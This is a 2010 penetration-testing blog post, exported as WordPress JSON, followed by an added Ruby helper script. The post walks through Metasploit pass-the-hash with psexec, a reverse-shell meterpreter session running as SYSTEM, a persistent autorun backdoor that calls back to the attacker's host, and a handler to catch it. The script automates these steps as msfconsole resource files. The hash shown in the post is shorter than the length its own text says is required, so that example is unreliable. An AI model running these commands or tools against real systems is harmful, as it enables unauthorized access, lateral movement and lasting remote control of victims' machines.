{"id":22,"date":"2010-10-08T01:32:00","date_gmt":"2010-10-08T01:32:00","guid":{"rendered":"http:\/\/www.somethingsomethingsecurity.com\/?p=22"},"modified":"2010-10-08T01:32:00","modified_gmt":"2010-10-08T01:32:00","slug":"metasploit-on-the-edge-part-4-next-up-to-bat","status":"publish","type":"post","link":"https:\/\/www.somethingsomethingsecurity.com\/?p=22","title":{"rendered":"Metasploit on the edge Part 4 &#8211; next up to bat"},"content":{"rendered":"<p>See the previous for the usual nag lines&#8230;<br \/><span><\/span><\/p>\n<div><b><span>Background<\/span><\/b><span><\/span><\/div>\n<div><span>When last we left, we had just launched a meterpreter session on our internal client and did some looking around for other systems.<\/span><\/div>\n<div><span><strong>Process<\/strong><\/span><\/div>\n<div><span>So now that we have identified some systems, let&#8217;s exploit one.<\/span><\/div>\n<div><span>10.13.37.130 looks interesting. Judging by the ports, it&#8217;s probably a windows system. I wonder if Fred has an account on it. 
Let&#8217;s see by using the Metasploit exploit psexec.<\/span><\/div>\n<div><span>use exploit\/windows\/smb\/psexec<br \/>msf exploit(psexec) > set SMBUSER fred<br \/>SMBUSER => fred<br \/>msf exploit(psexec) > set SMBPASS 921988ba001dc8e14a3b108f3cb6d:e19c5ee54e06b06a5907af13cef42<br \/>msf exploit(psexec) > set LPORT 80<br \/>msf exploit(psexec) > set LHOST 192.168.1.155<br \/>msf exploit(psexec) > set RHOST 10.13.37.130<br \/>msf exploit(psexec) > set PAYLOAD windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<div><span><strong>Explanation<\/strong><\/span><\/div>\n<div><span>psexec is a powerful weapon against Windows machines. The module is modelled on the psexec tool by Mark Russinovich, one of the Sysinternals tools hosted on microsoft.com, but Metasploit adds the bonus of accepting the LM:NTLM hash pair in place of the password, so we never have to crack it. 
For more information on how the pass-the-hash technique works, see <a href=\"http:\/\/oss.coresecurity.com\/projects\/pshtoolkit.htm\">http:\/\/oss.coresecurity.com\/projects\/pshtoolkit.htm<\/a>.<\/span><\/div>\n<div><span>In the previous episode, we dumped the hashes from the first system with meterpreter&#8217;s hashdump. We will use Fred&#8217;s now. SMBPASS has to be the full LMHASH:NTLMHASH pair, 32 hex characters each, exactly as hashdump printed it; anything else the module treats as a plaintext password and the logon simply fails.<br \/>msf exploit(psexec) > exploit<\/span><\/p>\n<div><span>[*] Started reverse handler on 192.168.1.155:80<\/span><\/div>\n<div><span>[*] Connecting to the server&#8230;<\/span><\/div>\n<div><span>[*] Authenticating as user &#8216;fred&#8217;&#8230;<\/span><\/div>\n<div><span>[*] Starting the service&#8230;<br \/>..<\/span><\/div>\n<div><span>[*] Meterpreter session 2 opened (192.168.1.155:80 -> 192.168.1.156:56723)<\/span><\/div>\n<div><span>Success. Looks like Fred does have an account, and an administrative one at that, since psexec needs to write to the admin share and create a service. Because the payload is started by that service, the session runs as SYSTEM.<\/span><\/div>\n<div><span>meterpreter > ipconfig<\/span><\/div>\n<div><span>Intel(R) PRO\/1000 MT Network Connection #2<br \/>Hardware MAC: 00:0c:29:6f:46:81<br \/>IP Address : 10.2.2.129<br \/>Netmask : 255.255.255.0<\/span><\/div>\n<div><span>Intel(R) PRO\/1000 MT Network Connection<br \/>Hardware MAC: 00:0c:29:6f:46:77<br \/>IP Address : 10.13.37.55<br \/>Netmask : 255.255.255.0<\/span><\/div>\n<div><span>Excellent! This server has two network cards. We could just start exploring this new network, but let&#8217;s first set this machine up as our pivot.<\/span><\/div>\n<div><span>There are several ways to use meterpreter as a backdoor.<\/span><\/div>\n<div><span>We could use metsvc, but that is a bind payload: our machine has to connect to a port the target listens on (the port is hardcoded in metsvc.rb, in the rport setting). 
This won&#8217;t work in our scenario because the firewall won&#8217;t let us connect in.<\/span><\/div>\n<div><span>We could also use msfpayload to generate an executable and use meterpreter to upload it to the server. There are excellent examples of using msfpayload at synjukie.blogspot.com\/2008\/10\/metasploit-payloads-msfpayload.html.<\/span><\/div>\n<div><span>But&#8230;there is an even easier option since we already have a meterpreter session: the persistence script.<\/span><\/div>\n<div><span><span>run persistence -U -i 5 -p 443 -r 192.168.1.155<\/span><\/span><\/div>\n<div><span>Explanation<br \/>-U start the agent when the user logs on<br \/>-i 5 have the agent try to connect back every 5 seconds<br \/>-p 443 and -r 192.168.1.155 are the port and IP of the handler we will set up next<\/span><\/div>\n<div><span>[*] Creating a persistent agent: LHOST=192.168.1.155 LPORT=443 (interval=5 onboot=true)<\/span><\/div>\n<div><span>[*] Persistent agent script is 611056 bytes long<\/span><\/div>\n<div><span>[*] Uploaded the persistent agent to C:\\WINDOWS\\TEMP\\rRFCGIkV.vbs<\/span><\/div>\n<div><span>[*] Agent executed with PID 312<\/span><\/div>\n<div><span>[*] Installing into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RomCdWAl<\/span><\/div>\n<div><span>[*] Installed into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RomCdWAl<\/span><\/div>\n<div><span>[*] For cleanup use command: run multi_console_command -rc \/&#8230;&#8230;&#8230;..\/clean_up__20100917.5158.rc<\/span><\/p>\n<div><span>Keep that cleanup script: it is what removes the .vbs from C:\\WINDOWS\\TEMP and the Run key, and it must be run before the engagement ends. One caveat: this psexec session runs as SYSTEM, so the HKCU written here is SYSTEM&#8217;s hive rather than Fred&#8217;s, and a -U entry made from this session won&#8217;t fire when Fred logs on. For an agent that should survive a reboot from a SYSTEM session, -X (which installs into HKLM Run) is the better choice. For now the agent is already running (PID 312), which is all we need.<\/span><\/div>\n<div><span>Now let&#8217;s exit all our meterpreter sessions.<\/span><\/div>\n<div><span>meterpreter > <span>exit<\/span><\/span><\/div>\n<div><span>[*] Meterpreter session 2 closed. Reason: User exit<\/span><\/div>\n<div><span>msf exploit(psexec) > <span>sessions -i 1<\/span><\/span><\/div>\n<div><span>[*] Starting interaction with 1&#8230;<\/span><\/div>\n<div><span>Remove the route we added in the previous part, since we won&#8217;t be needing it anymore, then exit.<\/span><\/div>\n<div><span>meterpreter ><span> exit<\/span><\/span><\/div>\n<div><span><span>Now 
set up our new payload handler.<\/span><\/span><\/div>\n<div><span><span>msf exploit(psexec) > <span>use exploit\/multi\/handler<\/span><\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set payload windows\/meterpreter\/reverse_tcp<\/span><\/span><\/span><\/div>\n<div><span><span>payload => windows\/meterpreter\/reverse_tcp<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set LHOST 192.168.1.155<\/span><\/span><\/span><\/div>\n<div><span><span>LHOST => 192.168.1.155<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set LPORT 443<\/span><\/span><\/span><\/div>\n<div><span><span>LPORT => 443<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><\/span><span> exploit<\/span><\/span><\/div>\n<div><span><span>and as quick as you can say &#8220;Bob&#8217;s your uncle&#8221;<\/span><\/span><\/div>\n<div><span><span>[*] Started reverse handler on 192.168.1.155:443<br \/>[*] Starting the payload handler&#8230;<br \/>[*] Sending stage (748544 bytes) to 192.168.1.156<br \/>[*] Meterpreter session 3 opened (192.168.1.155:443 -> 192.168.1.156:61943)<\/span><\/span><\/div>\n<div><span><span>our persistence agent connected back to us. Because the agent retries every 5 seconds, it is worth running the handler with set ExitOnSession false and exploit -j, so it keeps listening and catches the next callback if the session drops.<\/span><\/span><\/div>\n<div><span><span><strong>Next Steps<\/strong><\/span><\/span><\/div>\n<div><span><span>Exploring the next hop in the network, using portfwd to reach RDP.<\/span><\/span><\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>See the previous for the usual nag lines&#8230; Background When last we left, we had just launched a meterpreter session on our internal client and did some looking around for other systems. Process So now that we have identified some systems, let&#8217;s exploit one. 10.13.37.130 looks interesting. 
Judging by the ports, it&#8217;s probably a windows [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,3],"tags":[],"class_list":["post-22","post","type-post","status-publish","format-standard","hentry","category-metasploit","category-red"],"_links":{"self":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22"}],"version-history":[{"count":0,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/22\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
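As an added example (not code from the original post, nor Metasploit's own), here is a small Ruby script, in Metasploit's own language, that does the bookkeeping the psexec and persistence steps above rely on: it parses hashdump output into the SMBUser/SMBPass values exploit/windows/smb/psexec expects, rejects a truncated hash before it ever reaches the module (where it would be treated as a plaintext password and fail), flags the empty-LM marker, and writes the psexec step and the multi/handler for the persistence agent out as an msfconsole resource script. The hashdump lines are constructed test vectors (the well-known empty-password hashes and the hashes of the string "password"); the host and port values are placeholders mirroring the post.

```ruby
# Added example, not code from the original post or from Metasploit itself.
# Turns a meterpreter `hashdump` line into the SMBUser/SMBPass options that
# exploit/windows/smb/psexec accepts for pass-the-hash, rejects malformed
# hashes before they reach the module, and emits the psexec step plus the
# multi/handler that catches the persistence agent as an msfconsole .rc file.

# LM hash of the empty string: appears when LM storage is disabled or the
# password is longer than 14 characters. NTLM auth still works with the NT hash.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
HASH_RE  = /\A[0-9a-f]{32}\z/i

# Constructed sample in pwdump/hashdump format: user:rid:LMHASH:NTHASH:::
# (empty-password hashes for Administrator, hashes of "password" for fred).
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  fred:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
DUMP

# Parse hashdump text into one entry per account.
def parse_hashdump(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    user, rid, lm, nt = line.split(':', 5)
    { user: user, rid: rid.to_i, lm: lm, nt: nt }
  end
end

# psexec only treats SMBPass as a hash when it is exactly 32:32 hex chars;
# a truncated or mis-pasted hash is sent as a literal password and fails.
def valid_hash_pair?(lm, nt)
  !!(lm =~ HASH_RE && nt =~ HASH_RE)
end

# Build the SMBPass value, refusing anything the module would misread.
def psexec_smbpass(entry)
  unless valid_hash_pair?(entry[:lm], entry[:nt])
    raise ArgumentError, "malformed LM:NT hash for #{entry[:user]}"
  end
  "#{entry[:lm]}:#{entry[:nt]}".downcase
end

# True when the LM half is the empty-string marker (no usable LM hash).
def lm_disabled?(entry)
  entry[:lm].casecmp(EMPTY_LM).zero?
end

# Resource-script lines for the pass-the-hash psexec step (placeholder hosts).
def psexec_rc(entry, rhost:, lhost:, lport:)
  [
    'use exploit/windows/smb/psexec',
    "set SMBUser #{entry[:user]}",
    "set SMBPass #{psexec_smbpass(entry)}",
    "set RHOST #{rhost}",
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'exploit -j'
  ].join("\n") + "\n"
end

# Resource-script lines for the handler that catches the persistence agent;
# ExitOnSession false keeps it listening for the agent's periodic retries.
def handler_rc(lhost:, lport:)
  [
    'use exploit/multi/handler',
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'set ExitOnSession false',
    'exploit -j'
  ].join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  fred = parse_hashdump(SAMPLE_HASHDUMP).find { |e| e[:user] == 'fred' }
  puts psexec_rc(fred, rhost: '10.13.37.130', lhost: '192.168.1.155', lport: 80)
  puts handler_rc(lhost: '192.168.1.155', lport: 443)
end
```

Redirect the output to a file and load it with `msfconsole -r file.rc`; the handler half is written with ExitOnSession false and exploit -j so it stays up across the agent's reconnects.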